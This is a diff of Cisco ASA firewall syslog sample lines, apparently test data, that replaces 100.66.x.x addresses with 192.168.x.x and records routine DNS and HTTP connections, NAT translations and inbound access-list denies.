-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11814 for outside:100.66.100.107/53 (100.66.100.107/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11815 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1288 (172.31.98.44/1288)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11814 for outside:100.66.100.107/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 384
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11816 for outside:100.66.104.8/53 (100.66.104.8/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11816 for outside:100.66.104.8/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 94
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1289 to outside:100.66.98.44/8293
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11817 for outside:100.66.123.191/80 (100.66.123.191/80) to inside:172.31.98.44/1289 (172.31.98.44/1289)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11815 for outside:100.66.98.165/80 to inside:172.31.98.44/1288 duration 0:00:00 bytes 945 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11813 for outside:100.66.98.165/80 to inside:172.31.98.44/1287 duration 0:00:00 bytes 13284 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11818 for outside:100.66.100.4/53 (100.66.100.4/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11818 for outside:100.66.100.4/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1290 to outside:100.66.98.44/8294
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11819 for outside:100.66.198.25/80 (100.66.198.25/80) to inside:172.31.98.44/1290 (172.31.98.44/1290)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 9828 for outside:100.66.48.1/67 to NP Identity Ifc:255.255.255.255/68 duration 0:58:46 bytes 58512
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1272 to outside:100.66.98.44/8276 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11820 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11821 for outside:100.66.162.30/53 (100.66.162.30/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost 
CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11820 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 168
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11822 for outside:100.66.3.39/53 (100.66.3.39/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11821 for outside:100.66.162.30/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 198
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11822 for outside:100.66.3.39/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11823 for outside:100.66.48.186/53 (100.66.48.186/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11823 for outside:100.66.48.186/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 84
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1291 to outside:100.66.98.44/8295
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11824 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1291 (172.31.98.44/1291)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11825 for outside:100.66.254.94/53 (100.66.254.94/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11825 for outside:100.66.254.94/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 188
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1292 to outside:100.66.98.44/8296
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built 
outbound TCP connection 11826 for outside:100.66.54.190/80 (100.66.54.190/80) to inside:172.31.98.44/1292 (172.31.98.44/1292)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11827 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1293 (172.31.98.44/1293)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11828 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1294 (172.31.98.44/1294)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11827 for outside:100.66.98.165/80 to inside:172.31.98.44/1293 duration 0:00:00 bytes 5964 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11829 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1295 (172.31.98.44/1295)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11830 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1296 (172.31.98.44/1296)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11828 for outside:100.66.98.165/80 to inside:172.31.98.44/1294 duration 0:00:00 bytes 6694 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11829 for outside:100.66.98.165/80 
to inside:172.31.98.44/1295 duration 0:00:00 bytes 1493 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11830 for outside:100.66.98.165/80 to inside:172.31.98.44/1296 duration 0:00:00 bytes 893 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11831 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1297 (172.31.98.44/1297)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11832 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1298 (172.31.98.44/1298)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11833 for outside:100.66.179.9/53 (100.66.179.9/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11833 for outside:100.66.179.9/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 150
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11831 for outside:100.66.98.165/80 to inside:172.31.98.44/1297 duration 0:00:00 bytes 2750 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11834 for outside:100.66.247.99/80 (100.66.247.99/80) to inside:172.31.98.44/1299 (172.31.98.44/1299)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304
-Oct 10 
2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11835 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1300 (172.31.98.44/1300)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11832 for outside:100.66.98.165/80 to inside:172.31.98.44/1298 duration 0:00:00 bytes 881 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11835 for outside:100.66.98.165/80 to inside:172.31.98.44/1300 duration 0:00:00 bytes 2202 TCP FINs
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11836 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1301 (172.31.98.44/1301)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11837 for outside:100.66.98.165/80 (100.66.98.165/80) to inside:172.31.98.44/1302 (172.31.98.44/1302)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1276 to outside:100.66.98.44/8280 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1277 to outside:100.66.98.44/8281 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1278 to outside:100.66.98.44/8282 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1279 to outside:100.66.98.44/8283 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: 
Teardown dynamic TCP translation from inside:172.31.98.44/1280 to outside:100.66.98.44/8284 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1281 to outside:100.66.98.44/8285 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1282 to outside:100.66.98.44/8286 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1283 to outside:100.66.98.44/8287 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1284 to outside:100.66.98.44/8288 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1285 to outside:100.66.98.44/8289 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1286 to outside:100.66.98.44/8290 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1287 to outside:100.66.98.44/8291 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1288 to outside:100.66.98.44/8292 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1293 to outside:100.66.98.44/8297 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1294 to outside:100.66.98.44/8298 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1304 to outside:100.66.98.44/8308
-Oct 10 2018 12:34:56 
localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11840 for outside:100.66.205.99/80 (100.66.205.99/80) to inside:172.31.98.44/1304 (172.31.98.44/1304)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1295 to outside:100.66.98.44/8299 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1296 to outside:100.66.98.44/8300 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11841 for outside:100.66.0.124/53 (100.66.0.124/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11842 for outside:100.66.160.2/53 (100.66.160.2/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11841 for outside:100.66.0.124/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 318
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11842 for outside:100.66.160.2/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 104
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1305 to outside:100.66.98.44/8309
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11843 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1305 (172.31.98.44/1305)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1297 to outside:100.66.98.44/8301 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1298 to outside:100.66.98.44/8302 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: 
%ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1299 to outside:100.66.98.44/8303 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1300 to outside:100.66.98.44/8304 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1301 to outside:100.66.98.44/8305 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1302 to outside:100.66.98.44/8306 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305012: Teardown dynamic TCP translation from inside:172.31.98.44/1303 to outside:100.66.98.44/8307 duration 0:00:30
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11843 for outside:100.66.124.24/80 to inside:172.31.98.44/1305 duration 0:00:04 bytes 410333 TCP Reset-I
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1306 to outside:100.66.98.44/8310
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11844 for outside:100.66.124.24/80 (100.66.124.24/80) to inside:172.31.98.44/1306 (172.31.98.44/1306)
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" 
[0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 
0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0] 
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
-Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-4-106023: Deny tcp src outside:100.66.124.24/80 dst inside:172.31.98.44/8309 by access-group "inbound" [0x0, 0x0]
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1772 to outside:192.168.98.44/8256
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302013: Built outbound TCP connection 11757 for outside:192.168.205.104/80 (192.168.205.104/80) to inside:172.31.98.44/1772 (172.31.98.44/1772)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11749 for outside:192.168.211.242/80 to inside:172.31.98.44/1758 duration 0:01:07 bytes 38110 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11748 for outside:192.168.211.242/80 to 
inside:172.31.98.44/1757 duration 0:01:07 bytes 44010 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11745 for outside:192.168.185.90/80 to inside:172.31.98.44/1755 duration 0:01:07 bytes 7652 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11744 for outside:192.168.185.90/80 to inside:172.31.98.44/1754 duration 0:01:07 bytes 7062 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11742 for outside:192.168.160.197/80 to inside:172.31.98.44/1752 duration 0:01:08 bytes 5738 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11738 for outside:192.168.205.14/80 to inside:172.31.98.44/1749 duration 0:01:08 bytes 4176 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11739 for outside:192.168.124.33/80 to inside:172.31.98.44/1750 duration 0:01:08 bytes 1715 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11731 for outside:192.168.35.9/80 to inside:172.31.98.44/1747 duration 0:01:09 bytes 45595 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11723 for outside:192.168.211.242/80 to inside:172.31.98.44/1742 duration 0:01:09 bytes 27359 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11715 for outside:192.168.218.21/80 to inside:172.31.98.44/1741 duration 0:01:09 bytes 4457 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11711 for outside:192.168.198.27/80 to inside:172.31.98.44/1739 duration 0:01:09 bytes 26709 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11712 for outside:192.168.198.27/80 to inside:172.31.98.44/1740 duration 0:01:09 bytes 22097 TCP Reset-I
+Oct 10 2018 12:34:56 
localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11708 for outside:192.168.202.211/80 to inside:172.31.98.44/1738 duration 0:01:10 bytes 2209 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11746 for outside:192.168.124.15/80 to inside:172.31.98.44/1756 duration 0:01:07 bytes 10404 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11706 for outside:192.168.124.15/80 to inside:172.31.98.44/1737 duration 0:01:10 bytes 123694 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11702 for outside:192.168.209.247/80 to inside:172.31.98.44/1736 duration 0:01:11 bytes 35835 TCP Reset-I
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302014: Teardown TCP connection 11753 for outside:192.168.35.162/80 to inside:172.31.98.44/1765 duration 0:00:30 bytes 0 SYN Timeout
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic UDP translation from inside:172.31.98.44/56132 to outside:192.168.98.44/1188
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11758 for outside:192.168.80.32/53 (192.168.80.32/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11758 for outside:192.168.80.32/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 148
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302015: Built outbound UDP connection 11759 for outside:192.168.252.6/53 (192.168.252.6/53) to inside:172.31.98.44/56132 (172.31.98.44/56132)
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-302016: Teardown UDP connection 11759 for outside:192.168.252.6/53 to inside:172.31.98.44/56132 duration 0:00:00 bytes 164
+Oct 10 2018 12:34:56 localhost CiscoASA[999]: %ASA-6-305011: Built dynamic TCP translation from inside:172.31.98.44/1773 to outside:192.168.98.44/8257
+Oct 10 2018 
